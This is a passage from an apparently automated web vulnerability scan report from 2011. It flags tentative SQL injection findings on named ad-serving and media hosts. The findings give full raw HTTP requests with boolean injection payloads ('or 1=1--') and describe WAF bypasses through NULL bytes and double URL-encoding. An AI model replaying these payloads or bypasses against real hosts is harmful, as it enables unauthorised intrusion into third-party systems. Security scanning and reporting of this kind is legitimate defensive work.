fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d775029/8/923517/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc%00'/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1402


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.


</dd>
...[SNIP]...

Request 2

GET /adsc%00''/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
<hr>
<address
...[SNIP]...

1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cdn.media.abc.go.com
Path:   /m/images/global/generic/logo.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /m19952419'%20or%201%3d1--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response 1

HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:07:39 GMT
Connection: close

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML>

Request 2

GET /m19952419'%20or%201%3d2--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:22:39 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=274
Date: Sat, 17 Sep 2011 01:07:42 GMT
Connection: close


1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 5631
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstim
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:46 GMT
Server: cafe
Cache-Control: private
